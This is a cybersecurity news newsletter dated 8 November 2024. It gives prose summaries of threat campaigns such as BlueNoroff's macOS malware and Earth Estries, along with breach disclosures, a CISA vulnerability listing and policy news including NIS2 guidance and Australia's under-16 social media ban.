Cyber Briefing: 2024.11.08
?? What are the latest cybersecurity alerts, incidents, and news?
?North Korea, BlueNoroff, Crypto Firms, Hidden Risk Campaign, macOS Malware, ZIP Concatenation, Windows, Androxgh0st Botnet, Mozi, IoT, Earth Estries, Cybersecurity and Infrastructure Security Agency , Palo Alto Networks , Newpark Resources, Ransomware Attack, Universal Health Corporation, Symetra Life Insurance Company , OrthopedicsNY, Google News , India, Government Website, Gambling Promotion, European Union Agency for Cybersecurity (ENISA) , NIS2, Risk Management, Australia, Social Media Ban, Youth Protection, Detroit, Cryptocurrency, Taxes, Roblox , Safety Enhancements, Kids, Social Spaces, Embed Security , Funding, AI Solutions, Overworked Analysts
?Welcome to Cyber Briefing , the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.
First time seeing this? Please subscribe .
North Korean cyber actors from the group BlueNoroff are targeting cryptocurrency firms with a sophisticated macOS malware campaign, dubbed "Hidden Risk," that leverages social engineering and phishing tactics. Discovered by cybersecurity firm SentinelOne, the campaign uses fake cryptocurrency news emails to trick targets into downloading a malicious app disguised as a PDF file. Once executed, the app covertly installs a backdoor on the device, using an unusual persistence method that bypasses Apple’s standard security notifications by exploiting the zshenv configuration file.
Hackers have developed a new evasion technique called ZIP file concatenation to target Windows users by embedding malicious content within multiple combined ZIP files. This method allows attackers to bypass security detection by exploiting the way different ZIP readers interpret concatenated archives. While tools like 7zip display only the contents of the first ZIP file, potentially hiding malicious payloads, WinRAR can reveal all embedded files, making it more effective at spotting threats.
The Androxgh0st botnet has evolved by integrating components from the Mozi botnet, expanding its reach to target a wide range of IoT vulnerabilities. Initially focused on web server exploits since January 2024, this botnet now deploys Mozi-linked payloads, allowing it to infect IoT devices such as routers and security cameras. It leverages vulnerabilities in well-known platforms, including Cisco ASA, Atlassian JIRA, Metabase, and Apache Web Server, among others.
Earth Estries, a high-level cyber threat actor, continues to demonstrate its ability to execute sophisticated and prolonged cyber operations through the use of diverse tactics, techniques, and tools (TTPs). The group utilizes two distinct attack chains, exploiting vulnerabilities in systems such as Microsoft Exchange and network adapter management tools. The first attack chain involves PsExec and backdoors like Cobalt Strike, Trillclient, Hemigate, and Crowdoor, delivered via CAB files. In the second chain, Earth Estries deploys malware such as Zingdoor and SnappyBee, often delivered through cURL downloads. These operations allow Earth Estries to maintain persistence, employ lateral movement across networks, and steal credentials.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in Palo Alto Networks’ Expedition tool to its Known Exploited Vulnerabilities (KEV) catalog, following evidence of active exploitation. Tracked as CVE-2024-5910, the flaw involves a missing authentication issue in the Expedition migration tool, potentially allowing attackers to take over admin accounts and access sensitive data such as credentials and configuration secrets.
Newpark Resources, a Texas-based supplier of fluid systems and industrial solutions to the oil and gas industry, has reported a ransomware attack that disrupted its operations. In a filing with the U.S. Securities and Exchange Commission, the company revealed that it detected the cyber incident on October 29, 2024, when an unauthorized third party accessed its internal systems.Following detection, Newpark initiated its cybersecurity response plan and launched an internal investigation with external support to assess and contain the threat.
On or around July 29, 2024, Universal Health Corporation (UHC) detected unauthorized access to certain employee email accounts, leading to a potential breach of Protected Health Information (PHI). After immediate action, including password resets and engaging forensic experts, UHC confirmed on September 24, 2024, that an unauthorized third party may have accessed sensitive information, including personal and medical details such as names, Social Security numbers, medical records, and health insurance information.
In November 2024, Symetra Life Insurance Company reported a data breach involving unauthorized access to certain user accounts. Between April 12 and September 10, 2024, an external party was able to use personal information to log into customer accounts, exposing sensitive data such as names, addresses, email addresses, dates of birth, account numbers, and beneficiary details. Upon discovering the breach, Symetra immediately stopped unauthorized access and launched an investigation to determine the extent of the compromise.
OrthopedicsNY, LLP recently disclosed a data breach impacting sensitive patient information. The breach, which was discovered in December 2023, allowed an unauthorized party to access confidential data, including names, Social Security numbers, health insurance details, and protected health information. Following the breach, OrthopedicsNY secured its systems and launched an investigation to determine the extent of the compromise. The company filed an official notice with the Texas Attorney General on November 6, 2024, and began sending out notification letters to affected individuals.
On November 8, 2024, Google News was spammed by promotional links originating from a hacked Telangana government website, the Hyderabad Metropolitan Water Supply and Sewerage Board in India. The attack exploited a vulnerability in the site, which is typically used by Hyderabad residents to pay their water bills. Hackers injected malicious SQL code into the website, redirecting users to gambling and betting sites. The compromised links gained traction on Google News, particularly under the technology section’s latest news tab.
?? Cyber News
The European Union Agency for Cybersecurity (ENISA) has released new technical guidance to help EU Member States and entities effectively implement the cybersecurity risk management requirements outlined in the NIS2 Directive. This guidance supports the European Commission's goal of achieving a high level of cybersecurity across the EU by strengthening the resilience of critical sectors. Developed in collaboration with various cybersecurity groups, the guidance includes actionable advice on risk assessment, incident handling, business continuity, and supply chain security.
Australian Prime Minister Anthony Albanese has announced a groundbreaking initiative to ban social media use for individuals under 16 years old, citing concerns over online bullying, peer pressure, scams, and sexual harassment. The new legislation, expected to be introduced by the end of 2024, will place the responsibility on social media platforms to enforce the ban, with oversight from the eSafety Commissioner. While current users under 16 will not face penalties, those gaining parental consent to join platforms will be restricted.
Detroit is set to become one of the first major U.S. cities to accept cryptocurrency for tax payments and other city services starting in mid-2025. The city's Office of Treasury announced that payments will be processed through a secure platform managed by PayPal, which currently supports major cryptocurrencies like Bitcoin, Ethereum, Litecoin, and Bitcoin Cash. The move is part of Detroit's broader efforts to modernize its payment systems and attract blockchain innovation.
Roblox has introduced new safety measures aimed at protecting younger users by restricting access to certain experiences on its platform. Starting in 2025, users under the age of 13 will be prohibited from engaging in unrated experiences, social hangouts, and games that allow free-form 2D user creation. These changes are in response to concerns about online safety risks such as inappropriate language, grooming, and explicit content. Creators must complete a questionnaire to ensure their experiences meet safety standards before being accessible to younger players.
Embed Security, a cybersecurity startup founded in 2024 by former leaders from Meta, Google, FireEye, and Mandiant, has raised $6 million in an early-stage funding round led by Paladin Capital Group. The company offers an AI-driven security platform designed to alleviate the workload of overburdened security analysts by autonomously investigating alerts, detecting threats, and providing guidance. Embed Security's platform autonomously triages and prioritizes threats across the security stack, allowing analysts to focus on high-value tasks like remediation and threat hunting.
Subscribe and Comment.
Copyright ? 2024 CyberMaterial . All Rights Reserved.
Follow CyberMaterial on: